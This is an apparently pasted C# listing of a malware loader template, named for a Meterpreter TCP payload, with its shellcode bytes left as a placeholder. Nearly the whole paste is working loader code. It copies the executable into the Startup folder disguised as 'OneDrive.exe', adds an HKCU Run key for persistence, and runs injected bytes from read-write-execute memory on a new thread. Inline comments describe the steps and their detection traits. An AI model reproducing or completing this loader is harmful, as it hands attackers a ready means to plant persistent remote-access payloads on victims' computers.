
Untitled

a guest
Dec 9th, 2019
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Text;
  4. using System.Runtime.InteropServices;
  5. using System.Collections.Specialized;
  6. using System.Windows.Forms;
  7. using System.IO;
  8. using System.Threading;
  9. using Microsoft.VisualBasic;
  10. using Microsoft.Win32;
  11.  
  12. namespace TCPMeterpreterProcess
  13. {
  14.     // Template for a loader: Main copies a byte array into executable memory and runs it on a new
  15.     // thread, after moving the executable into the Startup folder and writing an HKCU Run value.
  16.     // The payload is a placeholder in this paste, so the listing does not compile as-is.
  17.     // NOTE(review): the namespace name suggests a Meterpreter TCP payload was intended; the bytes are not on the page.
  18.     class Program
  19.  
  20.     {
  21.         // shell32 import. ShellExecute is declared but never called in this listing.
  22.  
  23.  
  24.         [DllImport("shell32.dll")]
  25.  
  26.         public static extern long ShellExecute(int hwnd, string cmd, string file, string param1, string param2, int swmode);
  27.         [STAThread]
  28.         // Entry point. In order: Startup-folder move, Run-key write, executable allocation, copy, thread start, wait.
  29.         static void Main(string[] args)
  30.         {
  31.  
  32.             {
  33.                 // empty block, no effect
  34.             }
  35.             // Detection-relevant behaviour in the block below: a file named OneDrive.exe appearing in the
  36.             // per-user Startup folder, a Run value named "My Application" under HKCU, and a thread whose
  37.             // start address is a freshly allocated PAGE_EXECUTE_READWRITE region.
  38.             {
  39.                 // Payload bytes; "-->ShellCode-Here<--" is a placeholder, not valid C#.
  40.            //Gz
  41.                 byte[] shellcode = new byte[] {
  42. -->ShellCode-Here<--
  43. };
  44.                 // Persistence 1: moves the running executable to <Startup>\OneDrive.exe, a name borrowed from a well-known Microsoft product.
  45.                 {
  46.                     string startup = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
  47.                     System.IO.File.Move(Application.ExecutablePath, startup + @"\OneDrive.exe");
  48.                 }
  49.                 RegistryKey reg = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); // opened writable
  50.                 reg.SetValue("My Application", Application.ExecutablePath.ToString()); // Persistence 2: Run value "My Application" = Application.ExecutablePath
  51.                 UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
  52.                 MEM_COMMIT, PAGE_EXECUTE_READWRITE); // committed read-write-execute region sized to the payload
  53.                 Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); // copies the payload into that region
  54.                 IntPtr hThread = IntPtr.Zero;
  55.                 UInt32 threadId = 0;
  56.                 // prepare data
  57.                 // pinfo stays IntPtr.Zero, so the new thread receives no argument
  58.                 IntPtr pinfo = IntPtr.Zero;
  59.  
  60.                 // execute native code
  61.                 // starts a thread at funcAddr, then blocks on it with a 0xFFFFFFFF (INFINITE) timeout
  62.                 hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
  63.                 WaitForSingleObject(hThread, 0xFFFFFFFF);
  64.  
  65.             }
  66.         }
  67.         // Unused stub: always throws NotImplementedException and is not called in this listing.
  68.         private static void FileCopy(string v, object p)
  69.         {
  70.             throw new NotImplementedException();
  71.         }
  72.  
  73.         private static UInt32 MEM_COMMIT = 0x1000; // allocation type passed to VirtualAlloc
  74.  
  75.         private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; // page protection passed to VirtualAlloc: read, write and execute
  76.         private static string startup; // never assigned here; Main declares its own local of the same name
  77.         // kernel32 imports. Main calls only VirtualAlloc, CreateThread and WaitForSingleObject. Addresses are typed UInt32 in these signatures.
  78.         [DllImport("kernel32")]
  79.         private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
  80.         UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
  81.         // Declared but unused in this listing: VirtualFree, CloseHandle, GetModuleHandle, GetProcAddress, LoadLibrary, GetLastError.
  82.         [DllImport("kernel32")]
  83.         private static extern bool VirtualFree(IntPtr lpAddress,
  84.         UInt32 dwSize, UInt32 dwFreeType);
  85.  
  86.         [DllImport("kernel32")]
  87.         private static extern IntPtr CreateThread(
  88.  
  89.         UInt32 lpThreadAttributes,
  90.         UInt32 dwStackSize,
  91.         UInt32 lpStartAddress,
  92.         IntPtr param,
  93.         UInt32 dwCreationFlags,
  94.         ref UInt32 lpThreadId
  95.  
  96.         );
  97.         [DllImport("kernel32")]
  98.         private static extern bool CloseHandle(IntPtr handle);
  99.  
  100.         [DllImport("kernel32")]
  101.         private static extern UInt32 WaitForSingleObject(
  102.  
  103.         IntPtr hHandle,
  104.         UInt32 dwMilliseconds
  105.         );
  106.         [DllImport("kernel32")]
  107.         private static extern IntPtr GetModuleHandle(
  108.  
  109.         string moduleName
  110.  
  111.         );
  112.         [DllImport("kernel32")]
  113.         private static extern UInt32 GetProcAddress(
  114.  
  115.         IntPtr hModule,
  116.         string procName
  117.  
  118.         );
  119.         [DllImport("kernel32")]
  120.         private static extern UInt32 LoadLibrary(
  121.  
  122.         string lpFileName
  123.  
  124.         );
  125.         [DllImport("kernel32")]
  126.         private static extern UInt32 GetLastError();
  127.  
  128.     }
  129. }